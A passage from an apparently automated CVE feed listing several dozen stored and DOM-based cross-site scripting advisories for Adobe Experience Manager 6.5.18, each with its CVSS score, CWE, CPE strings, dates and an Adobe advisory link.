CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48561

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:40:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48561
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48562

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:40:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48562
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48563

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:40:45

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48563
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48564

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:40:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48564
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48565

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:39:41

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48565
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48566

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:39:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48566
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48567

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48567
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48568

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:23

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48568
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48569

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48569
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48570

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48570
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48571

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48571
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48572

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:26:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48572
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48573

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:26:26

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48573
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48574

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:26:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48574
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48575

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:25:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48575
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48576

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:25:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48576
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48577

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:25:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48577
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48578

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:25:30

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48578
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48579

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:24:45

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48579
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48580

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:24:07

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48580
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48581

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:10:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48581
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48582

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:11:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48582
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48583

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:11:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48583
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48584

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:12:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48584
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48585

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:13:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48585
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48586

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:13:14

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48586
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48587

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:13:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48587
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48588

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:13:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48588
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48589

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:14:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48589
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48590

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:14:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48590
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48591

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:15:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48591
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48592

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:15:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48592
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48593

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48593
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48594

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:10

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48594
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48595

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:22

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48595
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48596

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48596
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48597

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:16:41

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48597
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48598

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:16:48

Description :
